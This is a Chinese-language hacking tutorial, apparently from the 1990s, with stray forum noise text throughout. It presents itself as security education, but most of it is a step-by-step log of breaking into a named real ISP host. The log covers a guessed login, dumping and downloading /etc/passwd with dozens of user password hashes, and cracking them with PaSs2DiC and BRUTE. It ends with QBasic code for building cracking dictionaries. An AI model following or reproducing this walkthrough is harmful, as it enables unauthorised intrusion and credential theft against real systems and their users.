如何破解系統(tǒng)（3）

這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!

  O6 F2 V9 c, @6 Z前幾次說(shuō)到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號(hào)被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩周的探險(xiǎn)中, 為了找一個(gè)酷似網(wǎng)路咖啡站臺(tái)的
W3 密碼,誤入一個(gè)號(hào)稱第一個(gè)提供網(wǎng)路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
之後, 使用了自己寫的 PaSs2DiC + CJack 來(lái)解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這里提醒大家, 還好我沒有找到 root password, 不然可能該系統(tǒng)就此停擺,不可再見天日也! (當(dāng)然我不可能這麼作啦!).

/ z" T1 f! I3 R看看最近興起的網(wǎng)路咖啡及各大網(wǎng)站的系統(tǒng)安全設(shè)施, 再加上 CoolFire最近開會(huì)的時(shí)候遇到的情況, 不難發(fā)現(xiàn)我們的國(guó)家正往高科技的領(lǐng)域快步邁進(jìn), 但是這些系統(tǒng)的安全性若不加強(qiáng),可能到時(shí)候人家只要一臺(tái)電腦再加上一臺(tái)數(shù)據(jù)機(jī)就可以讓整個(gè)國(guó)家的金融及工商業(yè)崩潰!
大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術(shù)上理應(yīng)比較強(qiáng), 但還是輕易讓人入侵, 且又沒有教導(dǎo)User 正確的網(wǎng)路使用觀念 (Password 的設(shè)定及 proxy 的使用等),實(shí)在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會(huì)是甚麼樣子 ??
$ S/ q, E0 W) s+ K- L
  u/ N( y5 K- q' m1 x/ J4 W這一次的說(shuō)明還是沒有談到新的技巧, 在 James將首頁(yè)更新後各位應(yīng)該已經(jīng)可以從中學(xué)到許多東西了, 如果想要學(xué)習(xí)入侵, 就一定要知道最新的資訊 (入侵本國(guó)的網(wǎng)路則不用,反正沒人重視網(wǎng)路安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!

本次主題: 說(shuō)明如何連接該 ISP 并且對(duì)其 /etc/passwd 解碼連接位址: www.coffee.com.tw (203.66.169.11)特別說(shuō)明: 由於本次主題說(shuō)明重點(diǎn)使用真實(shí)的位址及名稱, 所以 CoolFire 已經(jīng) Mail給該網(wǎng)頁(yè)之維護(hù)人員更改密碼, 但該網(wǎng)頁(yè)之 ISP 仍為新手之練習(xí)好題材! CoolFire
! u3 Y9 S: R2 J- i" J0 j* m0 tMail 給該網(wǎng)頁(yè)維護(hù)人員之信件內(nèi)容如下, 如果他還不盡快改掉, 我也沒辦法了!

Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 請(qǐng)速更動(dòng)網(wǎng)頁(yè)密碼
From: CoolFire <coolfires@hotmail.com>
) c  F: J( A# p/ o3 j) n
你的網(wǎng)頁(yè)作得不錯(cuò), 但是因?yàn)槟闼O(shè)定的密碼太容易為駭客所? 入侵, 請(qǐng)於見到此信後速速更改你的網(wǎng)頁(yè)進(jìn)入密碼, 否則下次若網(wǎng)頁(yè)遭到篡改, 本人概不負(fù)責(zé)!!

**** 課程開始 ****

1 @: Y- |7 g/ e( ^1 F請(qǐng)注意: 由於本次所作的課程內(nèi)容以實(shí)作為主, 除了本人 IP 有所更改,一切都使用本人所用之
6 p( ^# J' ]5 T; T! cTelnet 軟體 Log 檔收錄, 故若道德感不佳者請(qǐng)勿閱讀以下之詳細(xì)破解內(nèi)容,否則本人概不負(fù)責(zé)!

0 w% C, M! |, b! W4 N, ?(連線到某一主機(jī)之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
: y( f4 r9 P9 {. P# o/ Lms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
+ W# F) y- s! c" GEscape character is '^]'.
Password: (隨便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
, A* [& }1 Y7 K! G" B7 `Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

8 F1 o# e2 E& t  I+ z; U; H歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
=================================================================
4 ?2 M+ z) g! R2 u6 H' I7 h
9 u* m8 P) E9 T' ^2 W1 `8 `(直接進(jìn)入核心部份)
: A3 Q8 [6 X4 X6 A5 Cwww:~$ cd /etc
  R1 n1 K( k* f7 A4 j3 K) [www:/etc$ ls
DIR_COLORS hosts.equiv printcap
& X2 n4 e5 n/ B2 gHOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
  [$ I) a( I+ m2 p+ e. S& @% Q0 \NNTP_INEWS_DOMAIN inetd.conf psdevtab
: U+ A. W5 y: L" YX11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
2 X' {3 h# S+ z# F" Wbootptab ioctl.save rpc
csh.cshrc issue securetty
& N3 W9 M( b& O! h0 c# s" \csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
: N6 B! f. c/ m$ p7 Lfastboot lilo/ shells
. t+ Q. z" Z; afdprm lilo.conf shutdownpid
7 a" {+ w! g, \  n7 w; v. n. `fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
* q- M3 m5 F& O, [; a5 Iftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
1 _& Z  N* ~/ W$ ~% R; Uftpusers mtools termcap
gateways named.boot ttys
" `8 O+ p3 }/ xgettydefs networks utmp@
3 f% {* b# G) \2 a1 O! q& bgroup nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
& E( A4 M, z7 a' e6 I0 f2 ?" Ihosts.deny ppp/
$ `; C& L; J& z% j+ P- w
% N, v& \' r+ A' n; o/ v: o# m# L(看看我們的目標(biāo)長(zhǎng)得如何???)
5 b1 @  S( r& I6 Q( a+ D" ?# a) ywww:/etc$ cat passwd
; A# e8 m4 n/ l4 ]$ H8 W  s) x; M* Proot:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
. L1 f+ c6 t2 ?lp:*:4:7:lp:/var/spool/lpd:
1 H/ B- o8 W$ I5 Esync:*:5:0:sync:/sbin:/bin/sync
" k. F! T8 L8 m) x; ~shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
/ J/ n9 o3 q7 D; F# fnews:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
& o3 A6 O# ?8 ]0 Zman:*:13:15:man:/usr/man:
  y- k5 n0 W' H) h3 ?9 vpostmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
' w- x" m' W1 }4 C# ?; Fguest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
; m3 h# o) z7 Y7 D  P5 {6 J/ F$ Ftest:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
: O6 ?! M7 ^) ^3 I  L( g* }fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
! y, Q0 ^7 J! d" ?( B+ ~/ N6 mwomen:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
7 O" A6 H: R' q. X' J$ h$ A  Skanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
3 y, Y  }2 I. ^  u0 Xcoffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
- Y' M1 C# z) v0 R3 Q+ W& ~# Fcarven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
0 I% M8 \4 B+ L. uprime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
/ T4 W  I5 j& K: {) R8 Ask:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
7 i: Q! o( A% {8 F. jhotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
% ]/ d! Y) I" Q& s* V- T5 ltaiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
5 u) g! @, j$ g4 h2 rsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
" `; H: W) |: }" Mrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
/ i+ Z! L/ Z% j2 s  l& Krecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
& v" }) [8 V3 krecycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
7 u3 h) D; n6 F; Mhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
+ L/ b7 T# m4 @# _+ h4 D0 U8 \rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
  a6 h  U7 M% N7 Kcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
# M. M: u# Y+ a6 x" n  Wjdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
# ~9 D+ X2 H! v) P: Z$ }2 c. zslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
- Y6 f& ~3 h- f2 f* R: N% r; k# ps6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
8 O8 J/ U8 W4 F2 I/ w. u# Yjordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
# d" t0 d( }# c/ u$ a7 dtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
$ j2 L3 H/ M3 X4 S# f( b+ kbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
. Q& @' u% _" b( Twunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash
$ c8 |: ~7 c: M+ |- P
0 N( u6 Y) _/ L5 i: @3 ^: r(CoolFire 注: 因?yàn)槭褂?PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過(guò)..... 除非你一個(gè)一個(gè)試?yán)瞺~~ 我沒說(shuō)喔!)
  ^3 F# ^, E$ g+ P  {
! f4 U" ^" ?- x7 @' g  ?/ cwww:/etc$ exit
logout
Connection closed by foreign host.
5 P0 F5 w6 Y* \
( e2 N9 g- }, C6 n. J1 a. E! Q, G3 t(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來(lái)吧!)

ms.hinet.net.tw> ftp www.coffee.com.tw
9 L( Q% V3 o$ m# i, ]Connected to www.coffee.com.tw.
& J- ~9 s1 n/ j220-
( S, x: z  \4 {4 X) x& a. T' E% e220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
! G# n/ E* V$ G( F; c220-
' T! d9 w, `9 P( }* v: _9 r. @220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
; i6 b; I& X: Q" P) W# M8 y220- If you have any suggestion, please mail to:
; t; L7 f# f0 b) Z6 v" D( C220- service@xx.xxxxxxx.xxx.xx.
  v& G* C6 z! f/ ^9 f' J220-
2 e9 ~9 T# G$ r9 @  {220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
' k3 [7 \, u! B/ Y- X- I
- ~! e  U# G% q. Z(還是使用剛剛的帳號(hào)進(jìn)入)
6 g; b3 w; y  Y* L$ {; }
2 r: Q' Y0 Q! c6 ^5 \9 ~Name (www.coffee.com.tw:YourName): coffee
* d4 l! d/ A/ w* Z4 w3 A( e331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
! W0 l. u; _0 d5 w
6 d" G8 |1 @2 C. _(直接到達(dá)檔案放置地點(diǎn))

, x- I) C: o' a: Vftp> cd /etc
* {3 v  N1 Y1 O. b9 A8 S250 CWD command successful.
4 @  E; ~! a2 S* {ftp> ls
9 d/ s2 k3 q7 d. h% C( L# I200 PORT command successful.
0 w3 Y) B9 i3 A150 Opening ASCII mode data connection for file list.
# R6 _4 ?" \8 d3 a! sttys
fdprm
6 b: S; i7 L  C9 L. V: `4 _! Xgroup
issue
motd
5 X- v  p) R. `. ^- i  m/ }% xmtools
$ G( ?( h% b' Sprofile
securetty
shells
termcap
, h" x) Y: h0 c6 o  R/ gskel
/ @$ V$ u" \  @+ r  L$ W& o2 u/ ycsh.cshrc
csh.login
lilo
; C3 {4 B3 `/ E4 h8 ?: tinet
default
/ _% z$ e( h- M2 \services
0 L" j" Z+ q  C; H8 q; h! aHOSTNAME
5 h0 f3 ~9 r: c" s  lDIR_COLORS
passwd
passwd.OLD
wtmp
4 x5 K% z) k& j- ^+ z" ]utmp
  c% K  Y9 r. Y/ q" c3 Xgettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
. S1 J' ^7 c" Qmagic
* F& o4 X  [* brc.d
syslog.conf
printcap
inittab
$ F: o: r7 x6 j1 k7 ksudoers
vga
diphosts
; g9 ^, `1 b* J* j) Q4 U% rmail.rc
3 x7 n) e2 d( a$ m6 e" L. P$ e1 qppp
; Z3 u( j" `; A+ ~; ?  pNNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
. P- M# |6 b3 F( rgateways
# I$ i7 q. i* u: Qbootptab
' M1 \: k# n6 _$ Z# Zexports
$ m: Q2 l7 a  {ftpusers
6 Y# d1 e& g+ T  }* f5 |# xhost.conf
hosts
4 Q" f" w. O6 i! \( t! L9 G8 ]hosts.allow
hosts.deny
& w3 n. b  r' u7 f; V7 L2 {hosts.equiv
inetd.conf
1 W- ^( R" |. Z) O( ?# O& Bnamed.boot
networks
nntpserver
6 P& e+ o  T4 Z3 nprotocols
, Z" o* y3 a9 G5 H' F7 `resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
; _$ e8 q* [& R/ \0 a# C' xmsgs
$ {& s; ?) q$ D, S& ~6 Nftpgroups
slip.login
9 ?" Q! L: P' s( lslip.hosts
& I( l9 |/ c7 {& e, x5 g1 b2 ?, Eyp.conf.example
# N5 a& N+ T% s5 o8 G, z, O8 WX11
lilo.conf
, u2 Y# v* Q' c5 Q+ Q& k/ msendmail.cf
fstab
fastboot
3 p: t' P1 U, A0 A" e% a9 z+ fmtab
6 P; r* {- M+ k; F: M& L- Tsyslog.pid
klogd.pid
6 J% g+ R4 J. B& p* U$ dshutdownpid
localtime
# N6 o* R1 f" X1 {, h: ?passwd.old
: U/ k7 g1 b9 Uioctl.save
psdevtab
$ K2 a1 ~0 C' j  Wftp.banner
8 g. I2 @. W7 {. l; kftp.deny
2 U3 k+ e# D. u$ N' Z" L; ~issue.net
motd.bak
; t0 k) d. c9 {securetty.old
) o1 ]: r/ Z5 W0 l2 F226 Transfer complete.
: B( |2 x; i& d
9 Z6 e  v" R* c# E! Y0 P# b(取回該檔案)

ftp> get passwd
3 _+ ~# B( G# z/ n. ^; j( @+ Q200 PORT command successful.
3 ~: a: t% D  Y; M6 M  p; f150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
# D1 V$ P. }8 }" b. v8 t, b4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

# q) g2 D, m, ]) A(盡速離開)

ftp> bye
  f. |9 @, A# O4 O. N$ R9 v221 Goodbye.

% F; c9 _! b9 X. ]- y/ C5 y好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來(lái)吧
!!快點(diǎn)跑一下, 讓它自動(dòng)產(chǎn)生字典檔案:
$ q& G. m# P% m/ x3 `
4 N, @' X% C  H5 T  Q4 tC:\hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
9 W* f, O: k% T! V
This tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target
0 H* H+ Z; c/ m
; |% m& k4 W: U9 UYour Source PASSWD File Name: passwd
# L0 n. ^$ ?* p9 l. ]Your Target Dictionary Name: dic.cfe
! k; S4 f% e4 A
PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
1 d, B5 x* ~$ l' B5 RFETAG Software Development Co: http://www.showtower.com.tw/~fetag
/ k8 H3 j" w6 Q) r# l) g
C:\hack>
; }5 z4 @1 y# a5 K9 v
. `$ s" R; I* h# l' a(這樣就好了 ! 自動(dòng)產(chǎn)生的檔案會(huì)放在 dic.cfe 這個(gè)檔案中, 咱們跑一下 Brute Force看看!)

( X/ h8 c" ~, W$ \9 A
5 y8 y/ v. G; AC:\hack>fbrute passwd @dic.cfe

" }' i, y; k! L! k) l( Y1 C# t! ZBRUTE!, Unix Brute Force Hacking Routine. v2.0
$ Y! r# K+ w" Z$ a, Q& PCopyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
; z5 i& \1 G$ A" |; a闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡
5 R3 t6 ^; D+ Z* N" Z0 z
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
Attempts/Hits: 5184/9
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
* T1 q* \8 M3 e$ C. e+ I- U
' r' ]" j& T) Q7 s3 }9 M; [Taking list input from dic.cfe
Beginning search of passwd for password: xxx
- _- n5 f; x# k( E0 a* T
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
. P4 y6 V6 R) ]! D/ J5 f6 O& PMatch for password xxx found! Username: xxx
" V' Y# ~4 ?" ZMatch for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
" q! u3 R  _* Z- O3 gMatch for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx
2 Y- M3 [2 |" w6 L4 i/ y( U
) l6 b, a7 \0 N+ s- ~Done.
# \, o/ i% H2 L  t
C:\hack>
" V; E1 ^  R8 v" c) O+ ?6 U
看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實(shí)在是....@#$%^...&*因某些關(guān)系所以其它部份要被 "馬賽克" 起來(lái), 請(qǐng)各位讀者見量!

**** 再談密碼 ****
+ V% j- L9 ^7 }- e) K$ \# D1 K% c
看了以上的破解示范, 就可以了解到許多人還是對(duì)於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設(shè)定一個(gè)好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
: {2 Y$ a$ j: ^( c7 FQBasic 來(lái)設(shè)計(jì)一個(gè)自動(dòng)產(chǎn)生密碼的小程式, 相信對(duì)許多人有很大的幫助,底下我們?cè)賮?lái)淺顯的介紹一下字母密碼的產(chǎn)生方法, 相信對(duì)於你在 Hack 某站會(huì)有更大的幫助.
) c% i1 K/ s. R: k( ]: ~
事情的開始是有一位網(wǎng)友 mail 給我, 問我字典檔要如何寫程式來(lái) "自動(dòng)擴(kuò)大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對(duì)這位網(wǎng)友的問題作一個(gè)更詳細(xì)的說(shuō)明 (因已簡(jiǎn)短回信答覆),并且寫出來(lái)讓大家了解一下, 當(dāng)然我們的示范還是使用 QBasic, 因?yàn)檫@是最容易找到的程式了,而且語(yǔ)法大家也可能會(huì)比較熟悉一點(diǎn), 如果我使用 VB 或 C 來(lái)寫, 可能有些人只會(huì)拿去用,而不會(huì)去修改或者寫個(gè)好一點(diǎn)的出來(lái)!

- o6 N; b& C# }: Y' H先說(shuō)明一下原理好了: 我們所要作的程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個(gè)簡(jiǎn)單的單字出來(lái)比較看看:
- j2 ?4 `1 L/ ~# ]$ F, Z0 U9 g% u
7 ~$ X4 D+ @- ^- B; h  s6 g[1] apple [2] guest [3] james [4] superman [5] password

& |0 f% v) P# t0 ]* l* J9 S& qOK! 來(lái)看看! 如果你有一點(diǎn)英文的概念的話應(yīng)該會(huì)知道母音及子音吧 !
( t3 A- j  M: E- [; ]+ t6 G我們首先這樣說(shuō)明: 母音在英文
上有 : A E I O U 這五個(gè), 所有的英文單字都會(huì)有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
9 E0 R9 L& `& J" h- `1 u再來(lái)就是比較每個(gè)字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個(gè)子音再接一個(gè)母音字母, 所以接下來(lái)依照常用字將這些子音找出來(lái), 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請(qǐng)自行統(tǒng)計(jì)), 然後是結(jié)尾部份, 通常結(jié)尾部分有下列幾種: e;est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來(lái)了 !!
8 x' }+ Z* R. L我大略寫一個(gè)簡(jiǎn)單的, 其它大家自行發(fā)揮, 如果有人學(xué)語(yǔ)言學(xué)的, 請(qǐng)幫忙弄一份常用組合表出來(lái), 可能會(huì)更有幫助吧 !!

底下就是該程式片段, 執(zhí)行後會(huì)產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個(gè)字的字典!!

--------------- MakeDic.BAS Start Here
- t/ `: |6 \0 s-------------------------------------------------------------------------------
--------
. ^1 K2 b$ G- RDIM FirstWord$(20)
DIM MotherWord$(13)
: [' K) }  Z( e# bDIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
"t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
- P6 `3 U, I9 r$ o; x5 ?DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

& n2 Q* x; V9 e: E- gFOR I = 1 TO 20
2 t; z* T& ?2 w, P- kREAD FirstWord$(I)
PRINT FirstWord$(I)
* k/ [8 I* `; b; hNEXT I
* W. A6 T  x, U4 ]; m4 X
FOR I = 1 TO 13
# q7 c3 Q1 N6 f# U- L1 YREAD MotherWord$(I)
' Z& j+ K1 \* e! r1 _* qNEXT I

FOR I = 1 TO 12
$ ~7 k& h8 ?# n% c$ t* u/ Q% {; sREAD LastWord$(I)
NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1
  S0 _/ n* B  E7 A% @7 h2 t
3 k5 L8 @4 N1 f6 f6 N8 lFOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
; V/ D, g3 b( g. f: NPRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
7 g5 |3 }/ V4 y: YNEXT K
, I$ b; d; `; {, @' b7 \  eNEXT J
/ {; v# y# u0 A: V/ ~) T! rNEXT I

- q( u4 F% @% q6 P# [0 CCLOSE : END
3 D6 T4 o) j* e" |/ Q--------------- Cut Here, End of MakeDic.BAS
" b  A# \7 J6 |3 t- K7 J3 q( D-------------------------------------------------------------------------------
1 T, Z, @( {+ i6 C2 o-

當(dāng)然這只是小部份的組合, 相信你可以作出一個(gè)更大的字典檔出來(lái), 如:
5 \8 w; A  S, r! n子音+母音+子音+母音+子音, 作出來(lái)的字典檔會(huì)很嚇人喔 !! 這一個(gè)部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式,寫好了請(qǐng) Mail 一份給我喔 !! 如果可以的話請(qǐng)說(shuō)明是否可以公布在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!
+ x- e* G9 ]% M
希望每次講到密碼的問題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對(duì)照看看,如果有相同的請(qǐng)趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業(yè)者...... ISP
們.... 教教你們的使用者吧..... 唉~~~~

  P$ U8 S+ ]9 A+ Z9 C' l
**** 後語(yǔ) ****
3 u+ F# a0 Y6 U- r
; O$ j6 y6 h8 Z7 `8 _7 c我們的首頁(yè)感謝大家的支持, 現(xiàn)在人數(shù)已經(jīng)到達(dá) 2,000 了, 這是一個(gè)地下站(未對(duì)外正式公布) 很棒的一個(gè)數(shù)字, 在與其它工作室人員研究之後, 暫時(shí)不對(duì)外公布站址, 如果你是 "誤闖"到本站來(lái)的! 我們歡迎你的加入, 但目前尚不考慮對(duì)外公布站址, 請(qǐng)您在告訴你的朋友有這麼一個(gè)站存在的時(shí)候,請(qǐng)他不要隨便告訴別人 (請(qǐng)只告訴你信賴的朋友; 或?qū)﹄娔X有一份特別狂熱的人, 我們都?xì)g迎他們的加入),我們目前所采用的方式將是開放式的! 對(duì)首頁(yè)部份暫時(shí)不以密碼方式處理.
" @  `% ]3 M3 g7 w0 H2 h9 Q
5 C1 h# l6 z: \& L** 不要 Crack 這個(gè)首頁(yè)的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會(huì)完全關(guān)閉, 再也不尋找其它的地方來(lái)放置, 希望給你的是使用電腦的 "知識(shí)", 不要利用它來(lái)奪取任何的 "權(quán)利",本首頁(yè)著重的是教育, 而不是一　的教導(dǎo)攻擊的方法, 希望大家對(duì)於政府機(jī)關(guān) (org.tw) 或教育機(jī)構(gòu) (edu.tw)不要作任何的破壞!!還有我的 ISP......:D

# S3 M3 B8 X& e* }------
